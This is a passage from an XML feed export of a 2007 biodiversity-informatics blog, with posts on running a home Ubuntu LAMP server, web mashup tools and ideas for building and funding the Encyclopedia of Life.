href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=139649991330502979' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/139649991330502979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/139649991330502979'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/doi-ezproxy.html' title='DOI + EzProxy'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6293775234949201106</id><published>2007-05-23T23:43:00.000-06:00</published><updated>2007-05-24T00:15:06.385-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='humour'/><title type='text'>How to Present Your First Paper at a Scientific Conference</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/yL_-1d9OSdk"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/yL_-1d9OSdk" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Still chicken?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6293775234949201106?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6293775234949201106/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6293775234949201106' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6293775234949201106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6293775234949201106'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/how-to-present-your-first-paper-at.html' title='How to Present Your First Paper at a Scientific Conference'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' 
width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6761060476915894225</id><published>2007-05-23T22:22:00.000-06:00</published><updated>2007-05-23T23:14:22.196-06:00</updated><title type='text'>The Headless, Household Server</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/RlUamEU3YbI/AAAAAAAAAAs/u8MK6cXlMMY/s1600-h/ubuntulogo.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/RlUamEU3YbI/AAAAAAAAAAs/u8MK6cXlMMY/s320/ubuntulogo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5067986196973969842" /&gt;&lt;/a&gt;&lt;br /&gt;Many of you are aware that The Nearctic Spider Database and all the other goodies I have been fussing with are hosted off a machine in my basement. I presented its design and capabilities at the last &lt;a href="http://www-museum.unl.edu/research/entomology/ECN/Meeting.htm"&gt;ECN meeting&lt;/a&gt; in Indianapolis, IN. The student with a server in his basement drew a few chides and chuckles, but I suspect it made many stop &amp; think. A few in attendance were wary of such a home-grown project. Back-ups? Theft? Damage? Flood? These same issues are faced by web hosting companies. As long as you have a reasonable solution to all these (e.g. scheduled and off-site storage of back-ups), and you periodically have a look at your web logs to assess traffic and bandwidth such that your Internet service provider doesn't pull the plug on you, what's the big deal? Databases and websites are portable. It would take perhaps an hour to remotely transfer the whole she-bang to another machine. What I also hope transpired from that meeting is an understanding that this stuff doesn't require rocket science and a massive team of database and web engineers. Just a bit of time and patience. 
So, this post is an introduction to a do-it-yourself, headless (no monitor), household server. If you have a ton of images and data that you haven't figured out what to do with, what are you waiting for?&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Hardware&lt;/strong&gt;: Any old PC will do so long as it has a reasonable amount of oomph and you can jam it full of memory. There are lots of local Mom &amp; Pop computer stores that will sell you a brand new PC for less than $500. Remember, you don't need an Operating System (more below) and you don't need a monitor...you'll just need to borrow one for the initial install. What you do need though are: 1) a good, name-brand power supply unit, 2) a bare-bones, read-only CD-ROM, 3) a quiet case with good ventilation, 4) a minimum of 2GB RAM, 5) a 2.4GHz processor or more (too much more is just a waste of energy), 6) a motherboard with onboard network connection &amp; video, and 7) a couple of hard drives (size depends on your needs).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Software&lt;/strong&gt;: &lt;a href="http://www.ubuntu.com/getubuntu/download"&gt;Ubuntu Server Edition&lt;/a&gt; provides a fully-functioning LAMP install as a free download that you can burn to CD. LAMP = Linux, Apache, MySQL database, and PHP for programmatic delivery of web pages. The &lt;a href="http://ubuntuforums.org/"&gt;Ubuntu community&lt;/a&gt; is very active and can help troubleshoot issues you may have with installation. With a reasonably well configured machine (cutting edge hardware is best avoided and unnecessary), you ought to be able to get a bare-bones LAMP install, ready for data import in an hour or so.&lt;br /&gt;&lt;br /&gt;What you also need is a hardware router and a home Internet service provider that is reasonably lax when it comes to hosting stuff on their pipes. Some purposefully block TCP port 80, the channel web traffic travels on, but many others recognize the stiff competition out there for customers and consequently, turn a blind eye. 
Since your home Internet protocol address might very well be dynamically-assigned, you can make use of free services like &lt;a href="http://www.dyndns.com/"&gt;DynDNS&lt;/a&gt; and configure your router to automatically send an update to this service should your provider assign you a new IP.&lt;br /&gt;&lt;br /&gt;There's more to it than this of course (e.g. database development, web page design and delivery &amp; remote access from another PC on your home network), but these are the basics. If you want a visual step-by-step, Falko Timme has a &lt;a href="http://www.howtoforge.com/perfect_setup_ubuntu704"&gt;nice article&lt;/a&gt; on howtoforge.com.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6761060476915894225?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6761060476915894225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6761060476915894225' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6761060476915894225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6761060476915894225'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/headless-household-server.html' title='The Headless, Household Server'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 
url='http://3.bp.blogspot.com/_VYUFlXOCOxE/RlUamEU3YbI/AAAAAAAAAAs/u8MK6cXlMMY/s72-c/ubuntulogo.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8716835674818070241</id><published>2007-05-18T22:25:00.001-06:00</published><updated>2007-05-18T22:50:28.798-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Remixing the Web II</title><content type='html'>I wondered when Microsoft would enter the visual mashup IDE world. With &lt;a href="http://pipes.yahoo.com"&gt;Yahoo Pipes&lt;/a&gt;, &lt;a href="http://www.zude.com"&gt;Zude&lt;/a&gt; and similar projects already in play, Microsoft has jumped in and is making great use of its cross-platform / cross-browser &lt;a href="http://www.microsoft.com/silverlight/"&gt;Silverlight&lt;/a&gt; plugin within a visual mashup interface they are calling &lt;a href="http://www.popfly.com/"&gt;Popfly&lt;/a&gt;. Google, where are you on this front? I had my reservations at first, but I am now thoroughly convinced that a MyEoL within The &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; is well within reach. 
What remains is intelligent and simple use of these technologies while maintaining accreditation for contributions.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8716835674818070241?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8716835674818070241/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8716835674818070241' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8716835674818070241'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8716835674818070241'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/remixing-web-ii.html' title='Remixing the Web II'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7072791551940055483</id><published>2007-05-17T18:22:00.001-06:00</published><updated>2007-05-18T22:51:11.932-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Monetizing the Encyclopedia of Life</title><content type='html'>First, let me preface this post by saying I know next to nothing of library informatics or politics. 
However, I have been chewing on an idea that may help monetize &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; in an acceptable fashion, thus creating a long-term flow of income to help build this great resource.&lt;br /&gt;&lt;br /&gt;While remotely using my institution's library to hunt for PDF reprints, it occurred to me that EoL ought to negotiate using &lt;a href="http://names.mbl.edu/rss/"&gt;uBioRSS&lt;/a&gt; as a database similar in functionality to the large-scale, educational databases like BioOne. My University uses EzProxy to coordinate logon by students to access library resources, which essentially means that remote sessions appear local. So, accessing a PDF from a publisher once authenticated through my library's system is quick and easy. In very simplistic (and admittedly naive) terms, "login.ezproxy.library.ualberta.ca" for example gets appended as a suffix to the publisher's domain to coordinate this pass-through authentication. Couldn't the uBioRSS service be rolled into EoL along with a reasonable subscription fee for institutions such that students and employees can directly access PDF reprints right off the species pages in EoL? The majority of the content on species pages in EoL would of course still be fully open access; it's merely the direct links to copyrighted PDF downloads that would require prior authentication from within an institution. 
It would be absurd to charge institutions the typical BioOne-type subscription fees, but why not a reasonable fee that helps offset the EoL staffing and infrastructure costs?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7072791551940055483?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7072791551940055483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7072791551940055483' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7072791551940055483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7072791551940055483'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/monetizing-encyclopedia-of-life.html' title='Monetizing the Encyclopedia of Life'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7311182378608605549</id><published>2007-05-17T13:59:00.000-06:00</published><updated>2007-05-18T22:51:24.912-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Remixing the Web</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rky1hkU3YaI/AAAAAAAAAAk/Pb-dUzXyqe0/s1600-h/logo_zude.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" 
src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rky1hkU3YaI/AAAAAAAAAAk/Pb-dUzXyqe0/s320/logo_zude.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5065623269176467874" /&gt;&lt;/a&gt;&lt;br /&gt;There's a new social networking application on the horizon that quite frankly, scares me. If you thought Facebook, MySpace, and other social networking applications or systems were pervasive &amp; viral, wait 'til Zude hits the scene. If you want a preview of the capabilities and have ~15-20 minutes to spare, I urge you to check out the ZDNet preview video: &lt;a href="http://zdnet.com.com/1606-2_2-6176625.html"&gt;http://zdnet.com.com/1606-2_2-6176625.html&lt;/a&gt;. David Berlind hinted that a beta of Zude would be available May 1st, but this hasn't yet happened. Marketing ploy to generate more interest? Not yet ready? No matter. When this appears, it'll completely change the landscape on the Internet and we'll collectively have to think very seriously about copyright and content ownership. Regardless of what happens on those fronts, it sounds as if a third party can license the drag-drop functionality in Zude. 
This has direct relevance to the MyEoL environment in &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7311182378608605549?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7311182378608605549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7311182378608605549' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7311182378608605549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7311182378608605549'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/remixing-web.html' title='Remixing the Web'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/Rky1hkU3YaI/AAAAAAAAAAk/Pb-dUzXyqe0/s72-c/logo_zude.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3153649882247699601</id><published>2007-05-11T19:51:00.000-06:00</published><updated>2007-05-18T22:51:39.339-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>The Living Encyclopedia - MyEoL</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RkUklmDSzsI/AAAAAAAAAAU/CO6CTTIxpcY/s1600-h/myeol.png"&gt;&lt;img style="float:right; margin:0 0 
10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RkUklmDSzsI/AAAAAAAAAAU/CO6CTTIxpcY/s320/myeol.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5063493584336113346" /&gt;&lt;/a&gt;&lt;br /&gt;The greatest challenge engineers and architects for the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; (EoL) will face is the proposed MyEoL, part of which will be the workbench for authors to contribute content. Without this, EoL degrades to a search engine with a spider (aka EoLbot) and a bit of Catalogue of Life name-smarts. In MyEoL, material must be made accessible in some form of drag-drop interface along with some form of textarea &lt;a href="http://www.google.com/search?q=define:wysiwyg"&gt;WYSIWYG&lt;/a&gt; box to write content. Images and snazzery (my new word-of-the-day) aside, it's ultimately the textual content that will drive discoverability. After all, this is the basis for any local or remote search engine index because image and video metadata are terrible. So how do you get contributors to sit down and type content? Do you first create a politically messy granting scheme by getting public funding agencies on-board to fund such manual efforts? Or, do you create something beyond the catch-phrase, Web 2.0?&lt;br /&gt;&lt;br /&gt;Like &lt;a href="http://ispecies.blogspot.com/2007/03/5-ways-to-mix-rip-and-mash-your-data.html"&gt;Rod Page&lt;/a&gt; of &lt;a href="http://darwin.zoology.gla.ac.uk/~rpage/ispecies/"&gt;iSpecies&lt;/a&gt; fame, I have been following the progress on mash-up technologies like Yahoo's Pipes, Dapper, OpenKapow and similar emerging tools. Nick Gonzalez has a &lt;a href="http://www.techcrunch.com/2007/03/02/5-ways-to-mix-rip-and-mash-your-data/"&gt;nice overview of these&lt;/a&gt;. The one that stands out from all these in my mind is &lt;a href="http://www.rssbus.com/"&gt;RSSBus&lt;/a&gt;. There are two reasons it hasn't quite caught on like Yahoo's Pipes and the others: 1. 
There is no slick user interface, and 2. it is not yet cross-platform. However, don't sell it short because it is far more powerful than most have given it credit. What really attracts me to RSSBus is its server to desktop and back (push-pull) architecture with the ability to use or create any sort of connector. One can pull xml data from an on-line resource, mix it with local Excel data or other data objects, then churn it out as an RSS feed if so desired. Here then is a superb opportunity for the systematics community - heck any biological community - to leverage this great work. Coincidentally, Donald Hobern (GBIF) has already coined a &lt;a href="http://eolinformatics.mbl.edu/Documents/hobern_technicalthoughts.html"&gt;Biodiversity Data Bus&lt;/a&gt; for EoL's server-server communications.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;But why stop at the server environment?&lt;/em&gt; What would truly change the way we conduct biological research, thus building the EoL dream, is if this data bus were extended to the desktop. Wouldn't you like to mix your local data with that pulled from external resources? I sure would. Better yet, imagine creating a Facebook-like community of colleagues when preparing data for a manuscript. Each co-author contributes his/her data via their desktop RSSBus, leverages the great work on names management undertaken by the Catalogue of Life and uBio thus making a great first crack at merging data sets, then the co-authors in this little invite-only community can collectively work on analyses and presentation for the manuscript. What we typically have today with co-authored manuscripts is one or a few more individuals responsible for the grunt work of merging data sets and making sense of it. 
At the end of a much more simplified, RSSBus-like communal data merging effort, I would then be very much inclined to click a button and push such a creation or parts of this creation back out to EoL.&lt;br /&gt;&lt;br /&gt;What also hasn't been effectively discussed is how EoL will acquire content to feed its pages. Will it be an EoLbot like what was hinted at in a few press announcements or will it be something like DiGIR with canned or modularized Darwin Core-like elements? That may work for existing species page providers who serve their pages from a backend, but what about all that great, flat HTML content out there that only traditional search engines like Google, Yahoo, MSN and other big players have been scouring? Does EoL intend to use Google, Yahoo, and others and scrape &lt;em&gt;their&lt;/em&gt; results to feed the initial EoL species pages? Yikes. That scares me because these engines may and often do produce erroneous results...they haven't got biological intelligence. Google Images is particularly bad at handling nomenclature and image associations as I discovered with some of the indexed content from &lt;a href="http://canadianarachnology.dyndns.org/data/spiders/33233"&gt;The Nearctic Spider Database&lt;/a&gt; (e.g. &lt;a href="http://images.google.ca/images?source=ig&amp;hl=en&amp;q=pardosa%20moesta"&gt;HERE&lt;/a&gt;). Here's also where we might be creative with RSSBus if it could be married with something like &lt;a href="http://www.opensearch.org/Home"&gt;OpenSearch&lt;/a&gt; and a client-run spidering and indexing tool for their served content. One such example is the inexpensive &lt;a href="http://www.wrensoft.com/zoom/"&gt;Zoom Search&lt;/a&gt; that has lots of great plug-ins to read image metadata and ultimately produces an index through its spidering algorithms for use in a template-driven search portal. This sort of system with a UDDI registry would be really cool because attribution is then possible without any great deal of effort. 
Stripping canned results from Google or Yahoo to build the initial content does not come bundled with attribution for the source. EoL can essentially create a search engine for content providers, freely hand it out and content providers can pretty-up their search portal and spider their content as they want. This is great value because as with Zoom Search, content providers can log search queries and get a sense for what people are actually searching for on their pages. Behind the scenes, EoL pulls content via OpenSearch to feed the RSSBus scaffolding in MyEoL.&lt;br /&gt;&lt;br /&gt;Though this video doesn't really give RSSBus its deserved credit and it's tough to see the relevance in biology, it none the less provides a glimpse of what I have been talking about with the "Living Encyclopedia" as opposed to merely an "Encyclopedia of Life".&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/WBtjiFdMWQw"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/WBtjiFdMWQw" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3153649882247699601?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3153649882247699601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3153649882247699601' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3153649882247699601'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3153649882247699601'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/living-encyclopedia-myeol.html' title='The Living Encyclopedia - MyEoL'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RkUklmDSzsI/AAAAAAAAAAU/CO6CTTIxpcY/s72-c/myeol.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8253049606002111500</id><published>2007-05-10T09:42:00.000-06:00</published><updated>2007-05-18T22:51:52.828-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Encyclopedia of Life</title><content type='html'>The &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; was officially launched yesterday and I have been reading various public postings to gauge response.&lt;br /&gt;&lt;br /&gt;&lt;object height="350" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/6NwfGA4cxJQ"&gt;&lt;param name="wmode" value="transparent"&gt;&lt;embed src="http://www.youtube.com/v/6NwfGA4cxJQ" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Of all those I have scanned, &lt;a href="http://science.slashdot.org/science/07/05/08/226230.shtml"&gt;Slashdot&lt;/a&gt; is perhaps the most active and most informative. So, here is my best attempt at summarizing public reception:&lt;br /&gt;&lt;br /&gt;1. There's a notable lack of understanding of how this will be different from WikiSpecies. 
There is little to no appreciation for the challenge of names management of the kind spearheaded by uBio. This is a critical piece of the puzzle that cannot be done in a 2-dimensional wiki environment.&lt;br /&gt;&lt;br /&gt;2. Most people understand that content will be developed by first "harvesting" material scattered on the Internet then cleaned-up by "scientists". But there has been little to no discussion on how that will be accomplished or how accreditation will be maintained.&lt;br /&gt;&lt;br /&gt;3. There hasn't yet been much discussion on the TAXACOM or ENTOMO-L listservs about the encyclopedia. A few suggested that monies would be better put into pure systematics rather than into a "bean-counting" exercise. Others recognize that the content will necessarily be created by systematists, but see that there is as yet no incentive to do so. Millions of $$ are dumped into scanning materials, wages, etc. but how does that filter down to individual contributors?&lt;br /&gt;&lt;br /&gt;4. The "MyEoL" vs. the canonical "EoL" content is not well appreciated.&lt;br /&gt;&lt;br /&gt;5. Timeframe for "completion" has been grossly misunderstood. Many believe they have to wait for 10 years to see anything come out of EoL.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;The EoL Workbench: "The Living Encyclopedia"&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;While I do think an Encyclopedia of Life will be a most amazing resource, there is a very large &amp; critically missing piece of the puzzle as it relates to #3 in my list above. The EoL promotional video grandly expresses that such an encyclopedia will transform the science of biology. How? What we see to date is a digital version of a paper encyclopedia with a bit of gadgetry to encourage public participation. If this is to transform biology, it must simplify communications or the work flow in day-to-day biological pursuits. 
This is where my "Living Encyclopedia" idea comes in.&lt;br /&gt;&lt;br /&gt;First, the communications required to conduct revisionary work need to be very well understood. For starters, ALL type specimens must first be made available &amp; tied to direct channels of communication with the curators charged with maintaining those holdings. The folks at GBIF have taken great first steps, but digital representations of ALL type specimens accessible via DiGIR, TAPIR or other means are nowhere near complete. Systematists must still scour old literature to learn where type specimens are held, write letters, etc. to acquire specimens BEFORE any serious revision can be started.&lt;br /&gt;&lt;br /&gt;Second, there is currently no effective link between publishers of taxonomic literature &amp; the nomenclators. Until that happens, an encyclopedia will be woefully dated.&lt;br /&gt;&lt;br /&gt;So here's the idea...&lt;br /&gt;&lt;br /&gt;Integrated into "MyEoL" ought to be a blank slate - an organizational workbench if you will. Here, systematists run very simple web service queries to GBIF to create a visual "cloud" of specimens of interest. This would be much like Yahoo's Pipes. Through drag-and-drop, communication with curators is coordinated for loans. A systematist would continue to use this tool to add/remove specimens according to the concept they are working with, connect pieces of the cloud to other resources like those in GenBank, insert references, etc. all via drag-drop. Upon completion of the work, the circumscribed specimens and the entire visual representation of the workflow are "locked" and a permanent URL is issued, which can and ought to be present in the eventual publication. When the publication is accepted, the systematist then returns to the workbench to insert the publication's DOI. In such a manner, all the digital bits are in place. 
This permanent URL that describes the circumscription of specimens is then in the public domain such that other systematists may examine the "guts" behind the publication. Once all is said and done, this then becomes the scaffolding for a species page in EoL.&lt;br /&gt;&lt;br /&gt;This is vastly different from a purely post-hoc encyclopedia because the incentive is a simplified &amp; accelerated workflow - a much lower-level entry point. So, the amount of teeth-pulling required to build an effective Encyclopedia of Life with content written by the scientific community is vastly reduced. The former model doesn't require accreditation for resources or material but the present model is a mess of very difficult "mash-ups". Sure, a first crack at the encyclopedia can be harvested content, but to be sustainable, it has to either adopt a distasteful monetization scheme (i.e. supported by click-through advertising) or create a low-level, organizational workbench of immense value to the scientific community, very easily expressed to government and public funding agencies like NSF, NSERC, etc.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8253049606002111500?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8253049606002111500/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8253049606002111500' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8253049606002111500'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8253049606002111500'/><link rel='alternate' type='text/html' 
href='http://ispiders.blogspot.com/2007/05/encyclopedia-of-life.html' title='Encyclopedia of Life'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8168440459126488504</id><published>2007-04-30T14:16:00.000-06:00</published><updated>2007-05-10T11:20:21.137-06:00</updated><title type='text'>Biodiversity Informatics relevance</title><content type='html'>For a long time now, I have been thinking about the relevance of biodiversity informatics in entomology/arachnology circles. Most entomologists grasp the idea of federated data from museums &amp;amp; private collectors, but I don't think many realize the potential for these data in their own research programs or would even think of looking for data outside their immediate reach. Like the majority of ecologists, entomologist/arachnologists do not have any desire to share data. In fact, most will refuse to do so for fear of being "scooped". This may simply be the "old-guard" stigma, but I fear not.&lt;br /&gt;&lt;br /&gt;I just read a review in Annual Review of Entomology entitled, "Biodiversity Informatics" by Norm Johnson (&lt;a href="http://arjournals.annualreviews.org/doi/abs/10.1146/annurev.ento.52.110405.091259"&gt;doi:10.1146/annurev.ento.52.110405.091259&lt;/a&gt;). In all honesty, the review seemed dumbed down and I suspect this wasn't Norm's doing, but was done at the behest of the editor or reviewers. In particular, I would have liked to have seen more on GUIDs and how these relate to aggregation of data, literature, etc. 
